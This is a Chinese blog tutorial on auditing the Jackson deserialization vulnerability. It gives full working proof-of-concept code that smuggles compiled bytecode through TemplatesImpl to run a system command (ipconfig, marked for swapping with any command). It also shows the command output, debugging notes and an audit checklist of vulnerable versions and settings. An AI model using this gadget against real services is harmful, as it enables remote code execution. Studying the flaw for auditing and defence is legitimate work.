1. JACKSON漏洞解析

poc代码:main.java

import com.fasterxml.jackson.databind.ObjectMapper;

import com.sun.org.apache.xerces.internal.impl.dv.util.Base64;

import org.springframework.util.FileCopyUtils;

import java.io.ByteArrayOutputStream;

import java.io.File;

import java.io.FileInputStream;

import java.io.IOException;

/**

 * Created by Administrator on 2017/6/12.

 */

public class main {

    public static void main(String[] args)  {

        String MASIT_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";

//改成exp存在的绝对路径

        String exp = readClassStr("D:\\workspace\\123\\target\\classes\\exp.class");

        String jsonInput = aposToQuotes("{\"object\":['com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl',\n" +

                "{\n" +

                "'transletBytecodes':['"+exp+"'],\n" +

                "'transletName':'p',\n" +

                "'outputProperties':{}\n" +

                "}\n" +

                "]\n" +

                "}");

        System.out.printf(jsonInput);

        ObjectMapper mapper = new ObjectMapper();

        mapper.enableDefaultTyping();

        User user;

        try {

            user = mapper.readValue(jsonInput, User.class);

            System.out.println(user.getSex());

            System.out.println(user.getName());

        } catch (Exception e) {

            e.printStackTrace();

        }

    }

    public static String aposToQuotes(String json){

        return json.replace("'","\"");

    }

    public static String readClassStr(String cls){

        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();

        try {

            FileCopyUtils.copy(new FileInputStream(new File(cls)),byteArrayOutputStream);

        } catch (IOException e) {

            e.printStackTrace();

        }

        return Base64.encode(byteArrayOutputStream.toByteArray());

   }

}

exp.java



import com.sun.javaws.progress.Progress;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.*;

/**
 * Created by Administrator on 2017/6/12.
 */
public class exp extends AbstractTranslet {
    public exp() throws Exception {

        try {
            BufferedReader br = null;
            //修改成你想要执行的命令
            Process p = Runtime.getRuntime().exec("ipconfig");
            br = new BufferedReader(new InputStreamReader(p.getInputStream()));

            String line = null;
            StringBuilder sb = new StringBuilder();
            while ((line = br.readLine()) != null) {
                sb.append(line + "\n");
                System.out.println(sb);
            }
            File file = new File("result.txt");
            //File file =new File("javaio-appendfile.txt");

            //if file doesnt exists, then create it
            if(!file.exists()){
                file.createNewFile();
            }

            //true = append file
            FileWriter fileWritter = new FileWriter(file.getName(),true);
            BufferedWriter bufferWritter = new BufferedWriter(fileWritter);
            bufferWritter.write(sb.toString());
            bufferWritter.close();
            System.out.println(sb);
        } catch (IOException e) {
            e.printStackTrace();

        }
    }
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}


 




user.java




import java.io.Serializable;

import java.util.Arrays;

import java.util.InputMismatchException;

import java.util.Objects;

/**

 * Created by Administrator on 2017/6/12.

 */

public class User {

    private Object object;

    public Object getObject() {

        return object;

    }

    public void setObject(Object object) {

        this.object = object;

    }

}




尝试执行:
发现result.txt中存在结果




Windows IP ����

��̫�������� �������� 2:

   ý��״̬  . . . . . . . . . . . . : ý���ѶϿ�

   �����ض��� DNS ��׺ . . . . . . . : 

��̫�������� Npcap Loopback Adapter:

   �����ض��� DNS ��׺ . . . . . . . :

   �������� IPv6 ��ַ. . . . . . . . : fe80::b047:25da:330b:45d4%18

   �Զ����� IPv4 ��ַ  . . . . . . . : 169.254.69.212

   ��������  . . . . . . . . . . . . : 255.255.0.0

   Ĭ�����. . . . . . . . . . . . . : 

��̫�������� ��������:

   �����ض��� DNS ��׺ . . . . . . . :

   �������� IPv6 ��ַ. . . . . . . . : fe80::fd81:27ba:8b8b:4a72%12

   IPv4 ��ַ . . . . . . . . . . . . : 10.0.83.198

   ��������  . . . . . . . . . . . . : 255.255.255.0

   Ĭ�����. . . . . . . . . . . . . : 10.0.83.1




调试本地代码:
由于Jackson中是通过readValue执行命令,
按F7进入当前函数:


跳过几次赋值,进入到当前函数,发现次函数中存在反序列化的赋值,按F7进行调试




经过多次调试发现,命令在标红处代码执行,并抛出异常




多部调试,F7进入函数代码(SetterlessProperty.java):




代码执行:




2. Jackson反序列化漏洞如何审计


OK,说到这就简单介绍了下,Jackson的反序列化代码运行的过程,那么现在代码审计中如何审计的出来项目是否包含Jackson反序列化呢?


第一步:看版本,如果Jackson的版本号不在存在漏洞的版本列表中,肯定不会有此漏洞,


版本列表:


Jackson 2.7版本(<2.7.10)


Jackson 2.8版本(<2.8.9)


第二步:你的Bean类中是否包含object类型的变量:


例如,我这边的User类中的Object变量定义为:private Object object


第三步:Jackson的ObjectMapper必须调用enableDefaultTyping:


ObjectMapper mapper = new ObjectMapper();


mapper.enableDefaultTyping();


满足以上三个要求,才能进行构造POC进行校验。
												


											
小白审计JACKSON反序列化漏洞的更多相关文章
	

    
								
  1. php反序列化漏洞复现
		
    超适合小白的php反序列化漏洞复现 写在前头的话 在OWASP TOP10中,反序列化已经榜上有名,但是究竟什么是反序列化,我觉得应该进下心来好好思考下.我觉得学习的时候,所有的问题都应该问3个问题: ...
    
		
    2. 
						
  2. ThinkPHP v6.0.x 反序列化漏洞利用
		
    前言: 上次做了成信大的安询杯第二届CTF比赛,遇到一个tp6的题,给了源码,目的是让通过pop链审计出反序列化漏洞. 这里总结一下tp6的反序列化漏洞的利用. 0x01环境搭建 现在tp新版本的官网 ...
    
		
    3. 
						
  3. [原题复现+审计][0CTF 2016] WEB piapiapia(反序列化、数组绕过)[改变序列化长度,导致反序列化漏洞]
		
    简介  原题复现:  考察知识点:反序列化.数组绕过  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 漏洞学习 数组 ...
    
		
    4. 
						
  4. Java审计之CMS中的那些反序列化漏洞
		
    Java审计之CMS中的那些反序列化漏洞 0x00 前言 过年这段时间比较无聊,找了一套源码审计了一下,发现几个有意思的点拿出来给分享一下. 0x01 XStream 反序列化漏洞 下载源码下来发现并 ...
    
		
    5. 
						
  5. PHP审计之PHP反序列化漏洞
		
    PHP审计之PHP反序列化漏洞 前言 一直不懂,PHP反序列化感觉上比Java的反序列化难上不少.但归根结底还是serialize和unserialize中的一些问题. 在此不做多的介绍. 魔术方法  ...
    
		
    6. 
						
  6. php代码审计9审计反序列化漏洞
		
    序列化与反序列化:序列化:把对象转换为字节序列的过程称为对象的序列化反序列化:把字节序列恢复为对象的过程称为对象的反序列化 漏洞成因:反序列化对象中存在魔术方法,而且魔术方法中的代码可以被控制,漏洞根 ...
    
		
    7. 
						
  7. Java反序列化漏洞通用利用分析
		
    原文:http://blog.chaitin.com/2015-11-11_java_unserialize_rce/ 博主也是JAVA的,也研究安全,所以认为这个漏洞非常严重.长亭科技分析的非常细致 ...
    
		
    8. 
						
  8. Java反序列化漏洞分析
		
    相关学习资料 http://www.freebuf.com/vuls/90840.html https://security.tencent.com/index.php/blog/msg/97 htt ...
    
		
    9. 
						
  9. .NET高级代码审计(第五课) .NET Remoting反序列化漏洞
		
    0x00 前言 最近几天国外安全研究员Soroush Dalili (@irsdl)公布了.NET Remoting应用程序可能存在反序列化安全风险,当服务端使用HTTP信道中的SoapServerF ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. xml语法规则
			
    所有 XML 元素都须有关闭标签 在 HTML,经常会看到没有关闭标签的元素: <p>This is a paragraph <p>This is another paragr ...
    
			
    2. 
						
  2. (原)HashMap之java8新特性
			
    首先说一下HashMap存储结构,数组.链表.树这三种数据结构形成了hashMap.存储结构下图所示,根据key的hash与table长度确定table位置,同一个位置的key以链表形式存储,超过一定 ...
    
			
    3. 
						
  3. [Day01] Python基础
			
    明天要完成的任务如下:  Python 四则运算 Python 数据结构 Python 元算符(in.not in.is.and.or) 用户输入 (input.raw_input) 流程控制 缩进  ...
    
			
    4. 
						
  4. 纯css实现翻牌特效
			
    大家有没有看到过网上很炫的翻牌效果,牌正面对着我们,然后点击一下,牌就被翻过来了,效果很酷炫,是不是很想知道是怎么实现的么,代码很简单,跟着小编往下走. 先给大家介绍一下翻牌的原理: 1.父容器设置设 ...
    
			
    5. 
						
  5. Tomcat 热部署
			
    Tomcat热部署就是实现不停机的发布项目和更新项目 1.修改conf目录下的tomcat-users.xml文件 在<tomcat-user>添加如下配置 [root@localhost ...
    
			
    6. 
						
  6. Caffe2 Tutorials[0]
			
    本系列教程包括9个小节,对应Caffe2官网的前9个教程,第10个教程讲的是在安卓下用SqueezeNet进行物体检测,此处不再翻译.另外由于栏主不关注RNN和LSTM,所以栏主不对剩下两个教程翻译. ...
    
			
    7. 
						
  7. 一个栗子上手CSS3动画
			
    最近杂七杂八的事情很多,很多知识都没来得及总结,是时候总结总结,开启新的篇章- 本篇文章不一一列举CSS3动画的属性,若需要了解API,可前往MDN 在开始栗子前,我们先补补基础知识. css3动画分 ...
    
			
    8. 
						
  8. 腾讯ISUX网页前端代码分析
			
    看了一下腾讯ISUX网页,无论是pc端还是移动端,展示都挺好看的,先对其代码进行分析如下: 1,先看前三行代码 <!DOCTYPE html> <!-- 腾讯 ISUX 是腾讯集团核 ...
    
			
    9. 
						
  9. ListView控件详解
			
    ListView是个较为复杂的控件   1.定义 把它拽进来,系统会自动在Designer.cs里添加一个  this.listView1 = new System.Windows.Forms.Lis ...
    
			
    10. 
						
  10. linux下实时监测命令运行结果工具:watch
			
    watch是一个非常实用的工具,可以实时监测一些经常变化的命令结果或文件,而不需要手动一次一次的输入命令. 语法: watch [选项] [命令参数] 选项: -n :指定刷新间隔时间,默认2秒. - ...
    
			
    11.